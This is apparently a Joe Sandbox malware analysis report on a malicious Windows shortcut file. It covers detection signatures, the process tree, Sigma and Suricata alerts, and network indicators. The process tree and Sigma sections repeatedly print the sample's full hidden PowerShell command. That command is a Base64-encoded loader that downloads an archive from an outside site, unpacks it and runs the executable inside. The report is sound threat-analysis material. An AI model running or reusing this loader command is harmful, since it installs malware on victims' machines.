Edit tour

Windows Analysis Report
S5dpmRJg30.lnk

Overview

General Information

Sample name:	S5dpmRJg30.lnk renamed because original name is a hash value
Original sample name:	27bc8cf12690aec8df78b3cf6e298b63.lnk
Analysis ID:	1640391
MD5:	27bc8cf12690aec8df78b3cf6e298b63
SHA1:	f3c1a714dee2413a97f5fa0588a90b84a6a95e5c
SHA256:	65729a2ac815d385eae0ec53cb58edc12bc915ac81bf7aa40d48b06029f2e243
Tags:	lnkuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Found API chain indicative of sandbox detection

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Powershell drops PE file

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Suspicious command line found

Suspicious powershell command line found

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Excel Network Connections

Sigma detected: Suspicious Office Outbound Connections

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7964 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8024 cmdline: powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)

EXCEL.EXE (PID: 7460 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Documents\MixDep2025.xlsx" MD5: 4A871771235598812032C822E6F68F19)

splwow64.exe (PID: 5636 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)

a.exe (PID: 7564 cmdline: "C:\Users\user\AppData\Local\Temp\a.exe" C:\Users\user\AppData\Local\Temp\\P.a3x MD5: 0ADB9B817F1DF7807576C2D7068DD931)

cmd.exe (PID: 5452 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "Expand-Archive -Path C:\ProgramData\py.zip -DestinationPath C:\ProgramData\PyPackages -Force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3040 cmdline: powershell -command "Expand-Archive -Path C:\ProgramData\py.zip -DestinationPath C:\ProgramData\PyPackages -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 1996 cmdline: C:\Windows\system32\cmd.exe /c python.exe logo.png MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AppInstallerPythonRedirector.exe (PID: 2072 cmdline: python.exe logo.png MD5: 5E1055E69FF01930C62388625726A90E)

svchost.exe (PID: 8184 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 8024	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1129:$b2: ::FromBase64String( 0x14b0:$b2: ::FromBase64String( 0x9746:$b2: ::FromBase64String( 0x242a5:$b2: ::FromBase64String( 0x2c8d3:$b2: ::FromBase64String( 0x4cefa:$b2: ::FromBase64String( 0x4d34e:$b2: ::FromBase64String( 0x4d6d5:$b2: ::FromBase64String( 0xc2500:$b2: ::FromBase64String( 0xc288b:$b2: ::FromBase64String( 0xc313f:$b2: ::FromBase64String( 0xc386d:$b2: ::FromBase64String( 0xc42bf:$b2: ::FromBase64String( 0xc4809:$b2: ::FromBase64String( 0xe05a2:$b2: ::FromBase64String( 0xe0929:$b2: ::FromBase64String( 0xf7b1e:$b2: ::FromBase64String( 0x1a6ec8:$b2: ::FromBase64String( 0x1be461:$b2: ::FromBase64String( 0x1da699:$b2: ::FromBase64String( 0x1de287:$b2: ::FromBase64String(

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAt

Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines

Source: Process started

Author: John Lambert (rule): Data: Command: powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression", CommandLine: powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLm

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.253.72, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7460, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 54345

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 54345, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7460, Protocol: tcp, SourceIp: 13.107.253.72, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression", CommandLine: powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLm

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8184, ProcessName: svchost.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T09:28:24.717101+0100	2028371	3	Unknown Traffic	192.168.2.4	54345	13.107.253.72	443	TCP
2025-03-17T09:28:31.182166+0100	2028371	3	Unknown Traffic	192.168.2.4	54347	13.107.253.72	443	TCP
2025-03-17T09:28:31.219266+0100	2028371	3	Unknown Traffic	192.168.2.4	54346	13.107.253.72	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T09:27:16.320498+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49721	66.248.206.135	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T09:27:14.665655+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49718	66.248.206.135	443	TCP
2025-03-17T09:27:16.320498+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49721	66.248.206.135	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: S5dpmRJg30.lnk	Virustotal: Detection: 34%			Perma Link
Source: S5dpmRJg30.lnk	ReversingLabs: Detection: 25%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.1% probability

Source: unknown	HTTPS traffic detected: 66.248.206.135:443 -> 192.168.2.4:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.4:54345 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A4E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00A4E387
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A5A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00A5A0FA
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A5A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	5_2_00A5A488
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A565F1 FindFirstFileW,FindNextFileW,FindClose,	5_2_00A565F1
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A1C642 FindFirstFileExW,	5_2_00A1C642
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A572E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00A572E9
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A57248 FindFirstFileW,FindClose,	5_2_00A57248
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A4D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00A4D836
